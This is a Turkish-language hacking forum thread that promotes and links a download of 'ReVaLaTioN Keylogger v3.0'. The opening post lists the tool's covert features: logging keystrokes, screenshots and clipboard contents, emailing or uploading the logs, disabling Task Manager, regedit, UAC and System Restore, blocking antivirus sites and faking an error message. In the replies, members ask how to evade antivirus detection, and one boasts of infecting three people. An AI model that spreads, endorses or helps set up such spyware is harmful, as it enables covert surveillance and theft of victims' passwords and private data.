ReVaLaTioN Keylogger v3.0 - Final Edition

02mia02

Uzman üye
23 Ağu 2010
1,781
0
Adıyaman

ReVaLaTioN Keylogger v3.0 - Final Edition

6apXyk.png

Ön Bilgi; Keylogger bana ait değildir. sonra saçma yorumlar yapmayınız...

Sizlere ReVaLaTioN Keylogger'in 3. Sürümünü Tanıtacağım...

ReVaLaTioN Keylogger v3.0 Server Özellikleri;

Bilgileri Şifrele: Server ’i oluştururken girmiş olduğunuz mail gönderme bilgilerini şifreler. Hedef kişi bu bilgilere ulaşamaz.
Kayıtlı Verileri Sil: Hedef kişinin bilgisayarındaki kayıtlı şifreleri siler. (IE, Mozilla, Chrome vs. Tarayıcılardaki Bilgiler)
Sys. Geri Yükleme Kapat: Sistem geri yüklemeyi engeller.
Regedit ve CMD Kapat: Kayıt defteri ve CMD girişi engeller.
Ekran Klavyesini Kapat: Hedef kişi eğer ekran klavyesinden veri girişi yapmak isterse ekran klavyesi otomatik kapanır.
Antivirüs Sitelerini Blokla: Toplamda tam 50 tane virüs tarama sitesini engeller.
Sahte Hata Mesajı: Server açılır açılmaz ekrana sahte hata mesajı gelir.
Başlangıçta Çalıştır: Hedef kişi bilgisayarını resetlese bile bilgisayar açıldığında server çalışmaya devam eder.
Görev Yöneticisi Kapat: Görev yöneticisini kapatır.
UAC Kapat: Kullanıcı hesabı denetimini kapatır. Server yönetici olarak çalışırken hedef kişiye sezdirmez.

Log Süresi: Kayıt edilen logların kaç dakikada gönderileceğini ayarlar.
SS Süresi: Kayıt edilen ekran görüntülerinin kaç dakikada gönderileceğini ayarlar.
C-P Süresi: Kopyala / Yapıştır yapılan verilerin kaç dakikada gönderileceğini ayarlar.

* En büyük değişimlerden biri .NET Framework 4.0 değil 2.0 destek özelliği.
* Keyloggerda FTP - Windows Live - Gmail log gönderme destekleri bulunmaktadır.
* %100 TR Karakter destekli.
* Shift tuşuna basınca kapanma hatası giderildi.
* >£#$½{[]} gibi karakterlerin desteğini vermektedir.
* Başlangıca eklemede bazen oluşan hatalar giderildi.
* Belli zaman sonra log gelmeme hatası giderildi.

İndir

Virüs Tarama Sonuçları İçin Tıklayınız...

Moderatör tarafında düzenlendi:

Fukaraa

Yeni üye
12 Ağu 2012
50
0
Abi allah razı Olsun kaç gündür ftpli bir sistem arıyorum çalışırsa sevabımı alırısn ramazan ayında

Fukaraa

Yeni üye
12 Ağu 2012
50
0
Kendimde denedim atıyorda karşı tarafa atınca log geliyormu deneyen oldumu bu arada anti virüse yakalandı :S yakalanmaması içni geliştirirseniz sevinirim

xHaxker

Katılımcı Üye
8 Ağu 2012
643
0
bu adamın sifreleri gelmiyor hangi siteye girdikleri geliyor adam faceye giriyor msn sifresi gelmiyor ?

vurguncu18

Katılımcı Üye
4 Şub 2012
333
0
oradan
wala rewalatıon favorım dır ılk kullandıgım keylogger de bu bunun ustune tanımam ilk 1.5 i kullanmıstım fena deıldı 2.0 a gecıs yaptım harıkaydıı oo ve buu super otesı bırsey gercekten sewdım grafık oldukca guzel tesekkurler paylastıgın ıcın :D

ersin0606

Yeni üye
10 Nis 2012
28
0
arkadaşım ben bunun işaretlenecek kutuları işaretlemeyi unuttum bana ekram görüntüleri felan gelmiyo bi yardım edersen bunun ayarlarını nerden yaparım:diablo:yo

xcl

Uzman üye
15 Ağu 2012
1,064
0
Diyarbakır
Kardesim Gercekten Süper Bir Program Az Once serveri Yaptım Dağıtım Suanda 3 Kisi İndirdide Ama Süreleri 30 DK Yaptım ;)

İnanmayanlar Linke Tıklayıp Bakabilirler Ama Sakın İndirmesinler ... !

Ispatı gormek İcin Tıkla

İyi Forumlar

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.